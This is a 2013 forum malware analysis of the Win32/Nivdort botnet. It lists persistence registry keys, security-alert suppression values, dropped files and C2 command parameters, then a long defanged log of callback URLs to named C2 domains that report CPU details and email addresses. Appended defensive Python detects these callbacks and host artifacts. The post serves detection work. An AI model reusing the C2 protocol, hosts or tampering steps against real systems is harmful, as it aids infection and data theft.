I couldn't find this topic, so first please allow me to post the malware base information (based on 2 months of tracking this botnet).
Variant Name:

Win32/Nivdort
sometimes as Win32/Bayrob or as Symmi < very confusing..

Typical characteristics to quickly identify this threat:

//autostart..
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\**etc etc
// usual kick up service..
SERVICES_ACTIVE_DATABASE
// overwrite hosts (in unix it is /etc/hosts) ...
C:\WINDOWS\system32\drivers\etc\hosts
// exe in temp....
C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\zvostv1nl1hdgydpehn.exe (random example)
// exe implanted...
C:\Documents and Settings\<USER>\Start Menu\Programs\Startup\zmgbnushjwx.exe
C:\WINDOWS\system32\zmgbnushjwx(random example).exe
// accessing paths like:
C:\WINDOWS\system32\pouuifospsdv(random example)\tst
C:\WINDOWS\system32\pouuifospsdv(random example)\lck
C:\WINDOWS\system32\pouuifospsdv(random example)\upd
C:\WINDOWS\system32\pouuifospsdv(random example)\etc
C:\WINDOWS\system32\pouuifospsdv(random example)\run
// tweaked infected PC security level:
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\FirewallOverride (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusDisableNotify (1)
HKEY_LOCAL_MACHINE\Software\Microsoft\Security Center\AntiVirusOverride (1)
// And your internet/proxy settings...
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\"ProxyEnable" = "0"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = "1"
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass" = "1"
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\MigrateProxy (1)
HKU\xxxx\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings (1)
// ..obviously to open a proxy on port 80
$cat %UserProfile%\Application Data\Mozilla\Firefox\Profiles\[CURRENT PROFILE]\user.js
user_pref("network.proxy.type", 0);

Sniffed information (stealing purpose):

*.ebay.com
*.ups.exe
*.escrow.com

Botnet Command:

// Requests (details are in the Botnet Callbacks PoC section):
method= validate (&mode=sox,email), ping, cfg, var-ip,
setvar (&key=cpuinfo&value=%CPU%),
checkport (&port=51573), all&flag
rsid=infected/HostID
sox=IP Address in Hex
v=VERSION_NUMBER ; or ; ver=VERSION_NUMBER (001-013)

BotNet sent value (FLAGS):

lport=0,1
slots=0,1
spm=0,1 // note that this flag exists.. suspected spam function

Mitigation string for blocking purposes (not a regex, be noted):

*/forum/search.php?method=*

Botnet Callbacks PoC:

h00p://lookloss.net/forum/search.php?method=validate&mode=my&email=EMAIL-ADDR@DOMAIN.COM&lici=auto_000860&ver=013
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=002&sox=2521d800
h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://signform.net/forum/search.php?method=validate&mode=sox&v=000&sox=2c453000
h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=my320d&sox=19ce4a01
h00p://elementarimagine.com/forum/search.php?method=ping&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=cfg&oknet&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=var-ip&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3184+MHz)&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=stopped&value=2cb48400&mode=sox&v=my320d&sox=19ce4a01&lport=1&rsid=2cb48400&slots=0&spm=0
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://palsticsurgery-community.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=2b61f601
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://palsticsurgery-community.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=my320c&sox=19ce4a01
h00p://elementarimagine.com/forum/search.php?method=ping&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=cfg&oknet&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=var-ip&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)&mode=sox&v=my320c&sox=19ce4a01&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=001&sox=2b61f601
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)&mode=sox&v=001&sox=2b61f601&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=005&sox=2c905800
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=checkport&port=51573&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://faircross.net/forum/search.php?method=validate&mode=sox&v=001&sox=2c4ce602
h00p://gadgets-small-talk-community.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://spumkaguga.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://dominoclub-grup.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=000&sox=19baba0c
h00p://elementarimagine.com/forum/search.php?method=all&flag&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3187+MHz)&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0
h00p://elementarimagine.com/forum/search.php?method=all&mode=sox&v=000&sox=19baba0c&lport=1&rsid=NOSOXYID123&slots=0&spm=0

Recent Sample Investigated:

https://www.virustotal.com/en/file/b8b93f40046495d44c6855a1c86c9357a030023c914d298bb9b60551b21d79b3/analysis/
https://www.virustotal.com/en/file/eea059174127860154f4dce1a7d8995a9a5056febf73819d63ddadb522ed6c8f/analysis/
https://www.virustotal.com/en/file/07d753966944f8425453bf201c51873abc67f674d9582bcc90e4532efeea67c6/analysis/
https://www.virustotal.com/en/file/ae6a43cc8b47819407b5e8852bdf554be8f1ad0364345963bfd44b3c3cdb9556/analysis/
https://www.virustotal.com/en/file/416d3eda1483e0addbcba0218750f75a90c569ba4cf5e2227e1d909fdf93d630/analysis/
https://www.virustotal.com/en/file/c4b29278fc90c4e87a1d3d524c96373f7326726b9c653b5d62d4555265ec7215/analysis/
https://www.virustotal.com/en/file/12a24575409c67c2860e58adba8333c70c8cc5f8a53f3910463323af7c7aca40/analysis/
https://www.virustotal.com/en/file/39598e475d12e492c1b7d2c1091c5ec040d3c8365d4825140a3cb743799e57c3/analysis/
https://www.virustotal.com/en/file/a9e2fe1dbb39902ff1cf2bcaabcf5676418c4dced3ddc18db680c7459dd9ab9c/analysis/
https://www.virustotal.com/en/file/e9ec6e9b74e5405a7427a8aee7beb4c522d2b97275fb19026bd8a33898f60249/analysis/
https://www.virustotal.com/en/file/2fa162050b6cf23feec40931b6b8f10f9addc3d00b2a8ab4c95c9c71bcfced96/analysis/
https://www.virustotal.com/en/file/37286961d40a37586e005ce6d9a9e88257d6299a2091802afa4ab2f21b875497/analysis/
https://www.virustotal.com/en/file/2fb070d0313b02008075a806455353367a95d49a077332a075c161b97726204a/analysis/
https://www.virustotal.com/en/file/484994eaa8da3e419e5e175a47020ffdb41aee38f13d9aa45c2c614a297c42a1/analysis/
Last edited by unixfreaxjp on Wed Nov 06, 2013 1:56 pm, edited 7 times in total.
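The callback grammar in the post (method=, mode=, v=/ver=, sox=, rsid= and the lport/slots/spm flags) and the blocking string */forum/search.php?method=* are enough to pull Nivdort C2 traffic out of ordinary proxy logs. The following is an added example written for this edit, not code from the post or from the malware: it applies the blocking string literally, parses each hit into a record, and decodes the sox value. The log lines are constructed for the example (the C2 hosts are the ones in the post), and the byte order used to turn sox into a dotted quad is an assumption, since the post only says "IP address in hex".

```python
"""Decode Win32/Nivdort C2 callbacks found in web/proxy logs.

Added example written for this edit; it is not code from the original post
or from the malware author. The URL grammar (method=, mode=, v=/ver=, sox=,
rsid=, lport=, slots=, spm=) is taken from the callback list in the post.
Assumptions: the log lines below are constructed, and the byte order used
to turn 'sox' into a dotted quad is a guess (the post only says "IP address
in hex"), so both readings are exposed.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

KNOWN_METHODS = {"validate", "ping", "cfg", "var-ip", "setvar", "checkport", "all"}  # from the post
FLAG_KEYS = ("lport", "slots", "spm")

# Constructed proxy log (epoch, client, verb, URL). Lines 1-3 mirror the
# post's callbacks; lines 4-5 are benign hits on a real forum path.
SAMPLE_LOG = """\
1383700001 10.0.0.7 GET http://elementarimagine.com/forum/search.php?method=validate&mode=sox&v=005&sox=2c905800
1383700002 10.0.0.7 GET http://elementarimagine.com/forum/search.php?method=setvar&key=cpuinfo&value=+Intel(R)+Xeon(R)+CPU+E5-1650+0+@+3.20GHz+(3186+MHz)&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
1383700003 10.0.0.7 GET http://elementarimagine.com/forum/search.php?method=checkport&port=51573&mode=sox&v=005&sox=2c905800&lport=1&rsid=NOSOXYID123&slots=0&spm=0
1383700004 10.0.0.9 GET http://forum.example.org/forum/search.php?keywords=nivdort&sf=titleonly
1383700005 10.0.0.9 GET http://forum.example.org/index.php
"""


@dataclass
class Callback:
    host: str
    method: str
    known_method: bool
    mode: str
    version: str                                          # v= or ver=
    sox: str
    rsid: str
    flags: Dict[str, str] = field(default_factory=dict)   # lport/slots/spm
    extra: Dict[str, str] = field(default_factory=dict)   # key/value, port, email, bare tokens


def matches_block_string(url: str) -> bool:
    """The post's blocking string */forum/search.php?method=* applied literally.
    Its '?' is the query separator, not a one-character wildcard (fnmatch would
    treat it as one): path ends in /forum/search.php AND query starts 'method='.
    """
    parts = urlsplit(url)
    return parts.path.endswith("/forum/search.php") and parts.query.startswith("method=")


def sox_to_ip(sox_hex: str, network_order: bool = True) -> str:
    """Render the 8 hex digits of 'sox' as a dotted quad. ASSUMPTION: the post
    does not say whether sox is big-endian or a little-endian DWORD, so
    network_order=False gives the other reading.
    """
    raw = bytes.fromhex(sox_hex.zfill(8))
    if len(raw) != 4:
        raise ValueError("sox must be exactly 4 bytes of hex")
    if not network_order:
        raw = raw[::-1]
    return ".".join(str(b) for b in raw)


def parse_callback(url: str) -> Optional[Callback]:
    """Callback record for a Nivdort C2 URL, or None if the URL is benign."""
    if not matches_block_string(url):
        return None
    parts = urlsplit(url)
    # keep_blank_values keeps bare tokens such as 'flag' and 'oknet'
    q = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    method = q.pop("method", "")
    v, ver = q.pop("v", ""), q.pop("ver", "")
    flags = {k: q.pop(k) for k in FLAG_KEYS if k in q}
    return Callback(
        host=parts.hostname or "", method=method, known_method=method in KNOWN_METHODS,
        mode=q.pop("mode", ""), version=v or ver, sox=q.pop("sox", ""),
        rsid=q.pop("rsid", ""), flags=flags,
        extra={k: val.strip() for k, val in q.items()},   # '+' is already decoded to ' '
    )


def scan_log(text: str) -> List[dict]:
    """Return the C2 hits in a 'ts client verb url' log, with their context."""
    hits = []
    for line in text.splitlines():
        cols = line.split()
        if len(cols) < 4:
            continue
        cb = parse_callback(cols[3])
        if cb is not None:
            hits.append({"ts": int(cols[0]), "client": cols[1], "callback": cb})
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        cb = h["callback"]
        print(h["client"], cb.host, cb.method, cb.version, sox_to_ip(cb.sox), cb.flags, cb.extra)
```

Two things worth noting from running it: the benign /forum/search.php?keywords=... hit is not flagged, because the blocking string requires the query to begin with method=, and the setvar callback leaks the CPU model string in clear text, so the same parser doubles as a quick inventory of which internal clients have checked in and under which version tag.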
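The host-side characteristics listed above (the four Security Center values set to 1, a random-named exe in system32 or the Startup folder, the system32\<random>\tst|lck|upd|etc|run file set, the forced network.proxy.type = 0 in Firefox's user.js, and the overwritten hosts file) can be checked mechanically. The block below is an added example written for this edit, not code from the post or from the malware. It keeps every check as a pure function over plain data so it runs on any platform against a constructed snapshot; the "random-looking name" regex is my own heuristic, and the extra hosts entry in the snapshot is invented, since the post does not say what the malware writes there.

```python
"""Host triage for the Win32/Nivdort artifacts listed in the post.

Added example written for this edit, not code from the post or the malware.
Each check takes plain data (registry values, file text, a directory) so it
runs anywhere. SNAPSHOT is constructed from the post's values; the
random-looking-name regex is my heuristic, not something the post states.
"""
import ntpath
import os
import re
import tempfile
from typing import Dict, List

SC_KEY = r"HKLM\Software\Microsoft\Security Center"
SC_TAMPER_VALUES = ("FirewallDisableNotify", "FirewallOverride",
                    "AntiVirusDisableNotify", "AntiVirusOverride")
MARKER_FILES = {"tst", "lck", "upd", "etc", "run"}        # post: system32\<random>\...
DEFAULT_HOSTS = {("127.0.0.1", "localhost"), ("::1", "localhost")}
RANDOM_EXE = re.compile(r"^[a-z0-9]{10,24}\.exe$")        # zmgbnushjwx.exe-style names
PLANT_DIRS = ("\\system32\\", "\\start menu\\programs\\startup\\")

# Constructed snapshot of an infected host; the extra hosts line is invented.
SNAPSHOT = {
    "security_center": {name: 1 for name in SC_TAMPER_VALUES},
    "run": {"zmgbnushjwx": r'"C:\WINDOWS\system32\zmgbnushjwx.exe"',
            "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe"},
    "user_js": 'user_pref("network.proxy.type", 0);\n',
    "hosts": "127.0.0.1 localhost\n::1 localhost\n127.0.0.1 update.example.test  # constructed\n",
}


def security_center_findings(values: Dict[str, int]) -> List[str]:
    """Values the post shows set to 1, i.e. Security Center alerts suppressed."""
    return [f"{SC_KEY}\\{n} = 1" for n in SC_TAMPER_VALUES if values.get(n) == 1]


def run_key_findings(run: Dict[str, str]) -> List[str]:
    """Autostart entries whose image is a random-looking exe in system32 or Startup."""
    out = []
    for name, cmd in run.items():
        image = cmd.strip().strip('"').split('"')[0]       # drop quotes and arguments
        low = image.lower()
        if RANDOM_EXE.match(ntpath.basename(low)) and any(d in low for d in PLANT_DIRS):
            out.append(f"Run\\{name} -> {image}")
    return out


def firefox_proxy_forced_off(user_js: str) -> bool:
    """user.js pinning network.proxy.type to 0, as the post's $cat shows."""
    return re.search(r'user_pref\("network\.proxy\.type",\s*0\);', user_js) is not None


def hosts_extra_entries(hosts_text: str) -> List[str]:
    """Entries beyond the stock localhost lines; the post says hosts gets overwritten."""
    extra = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()
        if len(fields) >= 2 and (fields[0], fields[1]) not in DEFAULT_HOSTS:
            extra.append(" ".join(fields))
    return extra


def find_marker_dirs(system32: str) -> List[str]:
    """Subdirectories of system32 that hold the whole tst/lck/upd/etc/run set."""
    return sorted(e.path for e in os.scandir(system32)
                  if e.is_dir() and MARKER_FILES.issubset(os.listdir(e.path)))


def make_demo_system32() -> str:
    """Constructed stand-in for %SystemRoot%\\system32 with one planted subdir."""
    sys32 = os.path.join(tempfile.mkdtemp(), "system32")
    os.makedirs(os.path.join(sys32, "drivers", "etc"))     # benign subdir, must not fire
    bad = os.path.join(sys32, "pouuifospsdv")
    os.mkdir(bad)
    for name in MARKER_FILES:
        open(os.path.join(bad, name), "w").close()
    return sys32


def triage(snapshot: dict, system32: str) -> Dict[str, list]:
    """Run every check and keep only those that fired."""
    findings = {
        "security_center": security_center_findings(snapshot["security_center"]),
        "run_keys": run_key_findings(snapshot["run"]),
        "firefox_proxy_off": ["network.proxy.type = 0"] if firefox_proxy_forced_off(snapshot["user_js"]) else [],
        "hosts_extra": hosts_extra_entries(snapshot["hosts"]),
        "marker_dirs": find_marker_dirs(system32),
    }
    return {k: v for k, v in findings.items() if v}


if __name__ == "__main__":
    for check, hits in triage(SNAPSHOT, make_demo_system32()).items():
        print(check, hits)
```

On a live Windows host the snapshot slots would be filled from the real sources: the Security Center and Run values via the standard-library winreg module (winreg.OpenKey plus winreg.QueryValueEx), user.js and hosts read as text, and find_marker_dirs pointed at %SystemRoot%\system32. The marker-directory check is the most specific of the five; the Security Center overrides and a proxy type of 0 also occur on clean machines and should be treated as corroboration rather than as a verdict on their own.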